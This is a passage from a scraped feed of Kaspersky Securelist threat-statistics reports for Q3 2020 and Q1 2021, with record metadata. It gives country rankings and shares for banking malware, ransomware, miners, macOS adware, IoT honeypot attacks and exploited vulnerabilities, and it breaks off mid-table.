malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAmong the adware modules and their Trojan downloaders in the macOS threat rating for Q3 2020 was Hoax.OSX.Amc.d. Known as Advanced Mac Cleaner, this is a typical representative of the class of programs that first intimidate the user with system errors or other issues on the computer, and then ask for money to fix them.\n\n### Threat geography\n\n_Geography of threats for macOS, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162347/malware-report-q3-2020_10-en.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 6.20% \n2 | France | 6.13% \n3 | India | 5.59% \n4 | Canada | 5.31% \n5 | Brazil | 5.23% \n6 | USA | 5.19% \n7 | Mexico | 4.98% \n8 | Great Britain | 4.37% \n9 | China | 4.25% \n10 | Italy | 4.19% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 5000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nSpain (6.29%) and France (6.13%) were the leaders by share of attacked users. They were followed by India (5.59%) in third place, up from fifth in the last quarter. As for detected macOS threats, the Shlayer Trojan consistently holds a leading position in countries in this Top 10 list.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2020, the share of devices whose IP addresses were used for Telnet attacks on Kaspersky traps increased by 4.5 p.p.\n\n| \n---|--- \nTelnet | 85.34% \nSSH | 14.66% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2020_\n\nHowever, the distribution of sessions from these same IPs in Q3 did not change significantly: the share of operations using the SSH protocol rose by 2.8 p.p.\n\n| \n---|--- \nTelnet | 68.69% \nSSH | 31.31% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2020_\n\nNevertheless, Telnet still dominates both by number of attacks from unique IPs and in terms of further communication with the trap by the attacking party.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162417/malware-report-q3-2020_11-en.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n**Country** | **%*** \n---|--- \nIndia | 19.99 \nChina | 15.46 \nEgypt | 9.77 \nBrazil | 7.66 \nTaiwan, Province of China | 3.91 \nRussia | 3.84 \nUSA | 3.14 \nIran | 3.09 \nVietnam | 2.83 \nGreece | 2.52 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\nIn Q3, India (19.99%) was the location of the highest number of devices that attacked Telnet traps. China (15.46%), having ranked first in the previous quarter, moved down a notch, despite its share increasing by 2.71 p.p. Egypt (9.77%) took third place, up by 1.45 p.p.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162445/malware-report-q3-2020_12-en.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n**Country** | **%*** \n---|--- \nChina | 28.56 \nUSA | 14.75 \nGermany | 4.67 \nBrazil | 4.44 \nFrance | 4.03 \nIndia | 3.48 \nRussia | 3.19 \nSingapore | 3.16 \nVietnam | 3.14 \nSouth Korea | 2.29 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\nIn Q3, as before, China (28.56%) topped the leaderboard. Likewise, the US (14.75%) retained second place. Vietnam (3.14%), however, having taken bronze in the previous quarter, fell to ninth, ceding its Top 3 position to Germany (4.67%).\n\n**Threats loaded into traps**\n\n**Verdict** | **%*** \n---|--- \nBackdoor.Linux.Mirai.b | 38.59 \nTrojan-Downloader.Linux.NyaDrop.b | 24.78 \nBackdoor.Linux.Mirai.ba | 11.40 \nBackdoor.Linux.Gafgyt.a | 9.71 \nBackdoor.Linux.Mirai.cw | 2.51 \nTrojan-Downloader.Shell.Agent.p | 1.25 \nBackdoor.Linux.Gafgyt.bj | 1.24 \nBackdoor.Linux.Mirai.ad | 0.93 \nBackdoor.Linux.Mirai.cn | 0.81 \nBackdoor.Linux.Mirai.c | 0.61 \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q3 2020, Kaspersky solutions blocked **1,416,295,227** attacks launched from online resources located across the globe. **456,573,467** unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162516/malware-report-q3-2020_13-en.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Vietnam | 8.69 \n2 | Bangladesh | 7.34 \n3 | Latvia | 7.32 \n4 | Mongolia | 6.83 \n5 | France | 6.71 \n6 | Moldova | 6.64 \n7 | Algeria | 6.22 \n8 | Madagascar | 6.15 \n9 | Georgia | 6.06 \n10 | UAE | 5.98 \n11 | Nepal | 5.98 \n12 | Spain | 5.92 \n13 | Serbia | 5.87 \n14 | Montenegro | 5.86 \n15 | Estonia | 5.84 \n16 | Qatar | 5.83 \n17 | Tunisia | 5.81 \n18 | Belarus | 5.78 \n19 | Uzbekistan | 5.68 \n20 | Myanmar | 5.55 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 4.58% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162544/malware-report-q3-2020_14-en.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2020, our File Anti-Virus detected **87,941,334** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 49.27 \n2 | Turkmenistan | 45.07 \n3 | Myanmar | 42.76 \n4 | Tajikistan | 41.16 \n5 | Ethiopia | 41.15 \n6 | Bangladesh | 39.90 \n7 | Burkina Faso | 37.63 \n8 | Laos | 37.26 \n9 | South Sudan | 36.67 \n10 | Uzbekistan | 36.58 \n11 | Benin | 36.54 \n12 | China | 35.56 \n13 | Sudan | 34.74 \n14 | Rwanda | 34.40 \n15 | Guinea | 33.87 \n16 | Vietnam | 33.79 \n17 | Mauritania | 33.67 \n18 | Tanzania | 33.65 \n19 | Chad | 33.58 \n20 | Burundi | 33.49 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/18162613/malware-report-q3-2020_15-en.png>))_\n\nOverall, 16.40% of user computers globally faced at least one **Malware-class** local threat during Q3.\n\nThe figure for Russia was 18.21%.", "cvss3": {}, "published": "2020-11-20T10:10:15", "type": "securelist", "title": "IT threat evolution Q3 2020. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1046", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-1477", "CVE-2020-1492", "CVE-2020-1525", "CVE-2020-1554", "CVE-2020-15673", "CVE-2020-15674", "CVE-2020-15675", "CVE-2020-6492", "CVE-2020-6542", "CVE-2020-6543", "CVE-2020-6544", "CVE-2020-6545"], "modified": "2020-11-20T10:10:15", "id": "SECURELIST:73735B62C781261398E44FFF82262BCD", "href": "https://securelist.com/it-threat-evolution-q3-2020-non-mobile-statistics/99404/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | 